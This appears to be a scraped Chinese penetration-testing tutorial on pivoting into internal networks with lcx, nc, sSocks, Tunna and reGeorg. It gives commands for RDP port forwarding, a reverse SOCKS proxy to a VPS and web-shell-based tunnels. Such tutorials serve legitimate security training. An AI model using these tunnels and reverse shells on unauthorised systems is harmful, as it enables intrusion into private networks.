<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            原文地址:http://drops.wooyun.org/tools/15000

            最近一段時間內網滲透做的比較多,剛好今天比較有時間,就總結一下內網中轉發的一些工具的使用。這里主要介紹了lcx、nc 、sSocket、tunna、reGeorg幾款平時用的比較多的工具,網絡上也有很多關于他們的介紹,而且也非常不錯,但是并沒有統一起來,寫這篇文章就算是一個小小的匯總吧。

            0x00 LCX轉發


            內網機器上執行:lcx.exe –slave 公網IP +端口 內網IP +端口

            例如:lcx.exe –slave 192.168.43.142 51 192.168.43.137 3389

            將內網(192.168.43.137)的3389端口轉發到公網(192.168.43.142)的51端口

            p1

            然后在公網的機器上:

            Lcx.exe –listen 監聽51端口,轉發到公網機器的3389端口

            例如:Lcx.exe –listen 51 3389

            p2

            這個時候已經將內網的3389轉發到了公網機器的3389端口,我們在本地機器上遠程公網IP+3389 ,就連接上了內網機器的3389

            p3

            0x01 NC 反彈CMDshell


            本機:192.168.43.142(win7) 遠程機器:192.168.43.137(xp)

            正向連接:

            在遠程機器上(t參數可以省略)

            p4

            在本地機器上

            p5

            成功之后,本地機器就獲得了一個遠程機器的shell

            p6

            反向連接:

            在本機運行上

            p7

            在遠程機器上(t參數可以省略)

            p8

            然后成功之后,我們在本地機器上看一下,已經獲得了遠程機器的cmdshell

            p9

            這里還有前人總結的十種反彈shell的方法,很不錯

            0x02 sSocket


            一個socks代理工具套裝,可用來開啟socks代理服務,支持socks5驗證,支持IPV6和UDP,并提供反向socks代理服務,即將遠程計算機作為socks代理服務端,反彈回本地,極大方便內網的滲透測試。

            下載地址:https://sourceforge.net/projects/ssocks/

            p10

            先在vps 執行rcsocket.exe –l 1088 –p 8888 –vv, 監聽1088端口

            p11

            內網機器執行./rssocks –vv –s 192.168.30.103:8888(VPS)

            p12

            成功,則會看到會話建立

            p13

            設置代理,讓本機可以通過VPS的1088端口訪問內網機器。

            14

            本機上 ssh 192.168.43.136內網主機

            p15

            成功ssh到內網機器

            p16

            0x03 Tunna 正向代理


            參考

            proxy.py -u http://xxx.com:206/test /conn.jsp -l 8888 -r 22 -v -s

            p17

            然后在xshell中執行
            ssh 127.0.0.1 8888,看到下面的樣子,說明已經成功了

            p18

            p19

            同樣的,如果內網的機器是windows,就把3389轉出來

            proxy.py -u http://xxx.com:206/test /conn.jsp -l 8888 -r 3389 -v

            其中幾個參數的解釋:

            另外,如果腳本傳到了內網A機器上,但是想登錄內網B機器,那么可以-a參數指定機器

            將內網中172.16.100.20主機的3389轉發到本地
            python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389

            0x04 reGeorg+proxifier 正向代理


            reGeorg是reDuh的繼承者,利用了會話層的socks5協議,效率更高一些。這也是平時用的比較多的工具。

            先將reGeorg的對應腳本上傳到服務器端,直接訪問顯示“Georg says, 'All seems fine'”,表示腳本運行正常

            p20

            運行python reGeorgSocksProxy.py -p 8888 -u http://www.xxx.com/tunnel.php

            p21

            將proxifier打開,在Proxy Server中這樣配置

            p22

            p23

            然后就可以在本地訪問內網的機器了

            p24

            成功3389到內網機器

            p25

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线